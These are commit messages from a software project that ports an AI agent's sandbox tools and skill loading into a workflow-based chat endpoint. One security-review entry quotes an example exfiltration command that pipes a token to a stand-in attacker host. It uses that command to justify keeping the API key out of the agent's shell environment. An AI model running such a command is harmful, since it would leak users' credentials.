* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop
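
For illustration, the `org-<slug>-<uuid>` extraction could look like the sketch below. The regex, the `null` return for non-matching input, and the function name `extractOrgIdSketch` are assumptions; the sample URL in the test is made up.

```typescript
// Matches a trailing "org-<slug>-<uuid>" segment, with optional ".git" or "/".
const ORG_REPO_PATTERN =
  /org-.+-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?:\.git)?\/?$/i;

// Hypothetical sketch; the real extractOrgId may handle more input forms.
function extractOrgIdSketch(cloneUrl: string): string | null {
  const match = ORG_REPO_PATTERN.exec(cloneUrl);
  const uuid = match?.[1];
  return uuid === undefined ? null : uuid.toLowerCase();
}
```

Anchoring the UUID at the end of the string lets the slug itself contain hyphens.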

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 CAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler: previously the call was not
  awaited, so a rejected cancellation could escape the try/catch.
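
The CAS-before-start ordering can be sketched against an in-memory store. Everything here is a simplified assumption (synchronous calls, the `InMemoryChats` class, the `claimThenStart` name); the real handler talks to Supabase and the workflow runtime asynchronously.

```typescript
type ChatRow = { id: string; active_stream_id: string | null };

// Hypothetical in-memory stand-in for the chats table.
class InMemoryChats {
  private readonly rows = new Map<string, ChatRow>();

  insert(row: ChatRow): void {
    this.rows.set(row.id, { ...row });
  }

  // Sets active_stream_id to `next` only if it currently equals `expected`.
  compareAndSetActiveStreamId(id: string, expected: string | null, next: string | null): boolean {
    const row = this.rows.get(id);
    if (row === undefined || row.active_stream_id !== expected) return false;
    row.active_stream_id = next;
    return true;
  }

  activeStreamId(id: string): string | null {
    return this.rows.get(id)?.active_stream_id ?? null;
  }
}

type StartResult = { status: 200; runId: string } | { status: 409 };

function claimThenStart(
  chats: InMemoryChats,
  chatId: string,
  placeholder: string, // e.g. "pending-<uuid>"
  startWorkflow: () => string,
): StartResult {
  // Claim first: the loser of the race returns 409 before any model call.
  if (!chats.compareAndSetActiveStreamId(chatId, null, placeholder)) {
    return { status: 409 };
  }
  const runId = startWorkflow();
  // Promote the placeholder to the real run id.
  chats.compareAndSetActiveStreamId(chatId, placeholder, runId);
  return { status: 200, runId };
}
```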

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.
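
The title-truncation fix in the list above can be sketched as follows. The value 80 for `TITLE_MAX_LENGTH` is an assumption based on the earlier "title-from-first-80" note, and `truncateTitle` is a hypothetical name.

```typescript
const TITLE_MAX_LENGTH = 80; // assumed value
const ELLIPSIS = "…"; // one character, unlike "..."

function truncateTitle(text: string, max: number = TITLE_MAX_LENGTH): string {
  const trimmed = text.trim();
  if (trimmed.length <= max) return trimmed;
  // Reserve room for the suffix so the result is exactly `max` characters.
  return trimmed.slice(0, max - ELLIPSIS.length) + ELLIPSIS;
}
```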

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
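
Both fixes can be illustrated without Supabase. The sketch below shows in-operator narrowing on a result union and the "split the where map" step as a pure function; `describeCasResult`, `splitWhere`, and the `WhereMap` type are hypothetical names, and the query-builder calls themselves are left out.

```typescript
type CasResult = { ok: true; claimed: boolean } | { ok: false; error: string };

function describeCasResult(result: CasResult): string {
  // `"error" in result` narrows by property presence, not by the `ok` literal.
  if ("error" in result) return `error: ${result.error}`;
  return result.claimed ? "claimed" : "race lost";
}

type WhereValue = string | number | boolean;
type WhereMap = Record<string, WhereValue | null>;

// Separates `column = value` pairs (one bulk match call) from
// `column IS NULL` columns (one call each), avoiding builder reassignment.
function splitWhere(where: WhereMap): { equals: Record<string, WhereValue>; nullColumns: string[] } {
  const equals: Record<string, WhereValue> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) nullColumns.push(column);
    else equals[column] = value;
  }
  return { equals, nullColumns };
}
```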

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
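
The tightened guard from the P2 item might look roughly like the sketch below. The `AgentContext` shape is reduced to the two fields named above and is an assumption; the real type carries more.

```typescript
// Hypothetical, reduced shape: only the fields the review comment mentions.
interface AgentContext {
  sandbox: { state: object; workingDirectory: string };
}

function isAgentContext(value: unknown): value is AgentContext {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  // Both fields must be present and usable, not merely defined.
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```

With this shape, `{ sandbox: {} }` is rejected up front instead of failing later inside a tool.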

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB
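
As an illustration of the "exact-string replace, ambiguous-match rejection" behavior listed for editFileTool, here is a sketch on plain strings. The function name, result shape, and error wording are hypothetical; the real tool operates on sandbox files.

```typescript
type EditResult =
  | { success: true; content: string }
  | { success: false; error: string };

function replaceExact(content: string, oldString: string, newString: string): EditResult {
  if (oldString.length === 0) {
    return { success: false, error: "oldString must not be empty" };
  }
  // split() on a literal string counts non-overlapping occurrences.
  const occurrences = content.split(oldString).length - 1;
  if (occurrences === 0) {
    return { success: false, error: "oldString not found" };
  }
  if (occurrences > 1) {
    return { success: false, error: `oldString matches ${occurrences} times` };
  }
  // Slice instead of String.replace so `$` sequences in newString stay literal.
  const index = content.indexOf(oldString);
  return {
    success: true,
    content: content.slice(0, index) + newString + content.slice(index + oldString.length),
  };
}
```

Rejecting multiple matches forces the caller to supply more surrounding context rather than silently editing the first hit.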

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path
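
Both helpers are small enough to sketch. The signatures below are assumptions based only on the one-line descriptions above, not the ported source.

```typescript
// Wrap the value in single quotes; each embedded ' becomes '\''
// (close the quote, emit an escaped quote, reopen the quote).
function shellEscape(value: string): string {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

// Show paths inside the working directory as relative; leave others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, "");
  if (absolutePath === root) return ".";
  if (absolutePath.startsWith(root + "/")) {
    return absolutePath.slice(root.length + 1);
  }
  return absolutePath;
}
```

Comparing against `root + "/"` rather than `root` keeps a sibling such as `/work/application` from being treated as inside `/work/app`.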

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting
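
A rough sketch of the YAML-subset parsing described for parseSkillFrontmatter (key:value pairs, quoted strings, booleans, colons preserved in values). The function name, return type, and comment handling are assumptions; the real parser may accept more or less.

```typescript
type FrontmatterValue = string | boolean;

function parseFrontmatter(source: string): Record<string, FrontmatterValue> {
  const result: Record<string, FrontmatterValue> = {};
  const match = /^---\r?\n([\s\S]*?)\r?\n---/.exec(source);
  if (!match) return result;
  for (const line of match[1].split(/\r?\n/)) {
    // Split on the FIRST colon only, so values such as URLs keep theirs.
    const colon = line.indexOf(":");
    if (colon <= 0 || line.trim().startsWith("#")) continue;
    const key = line.slice(0, colon).trim();
    const value = line.slice(colon + 1).trim();
    const quoted = /^(["'])(.*)\1$/.exec(value);
    if (quoted) {
      result[key] = quoted[2]; // strip matching surrounding quotes
    } else if (value === "true" || value === "false") {
      result[key] = value === "true";
    } else {
      result[key] = value;
    }
  }
  return result;
}
```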

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.
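
The three-stage pipeline named above can be sketched as plain string transforms. The blank line after the `Skill directory:` header and the `renderSkill` wrapper are assumptions made for this illustration.

```typescript
function extractSkillBody(content: string): string {
  // Drop a leading `--- ... ---` frontmatter block if present.
  return content.replace(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/, "").trim();
}

function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

function substituteArguments(body: string, args: string): string {
  // split/join replaces every occurrence without treating `$` specially.
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical wrapper that applies the stages in the order the commit lists.
function renderSkill(content: string, skillDirectory: string, args: string): string {
  return substituteArguments(
    injectSkillDirectory(extractSkillBody(content), skillDirectory),
    args,
  );
}
```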

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)
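
The behaviors covered by those unit tests can be sketched as follows. The `ListDirectory` callback is a hypothetical stand-in for reading a directory through the sandbox, and the signatures are assumptions.

```typescript
// Hypothetical listing callback standing in for a sandbox directory read.
type ListDirectory = (directory: string) => string[];

function getGlobalSkillsDirectory(homeDirectory: string): string {
  // Tolerate a trailing slash on $HOME.
  return `${homeDirectory.replace(/\/+$/, "")}/.agents/skills`;
}

function findSkillFile(skillDirectory: string, list: ListDirectory): string | null {
  const entries = list(skillDirectory);
  // Prefer SKILL.md, fall back to skill.md, otherwise report nothing found.
  for (const candidate of ["SKILL.md", "skill.md"]) {
    if (entries.indexOf(candidate) !== -1) return `${skillDirectory}/${candidate}`;
  }
  return null;
}
```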

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

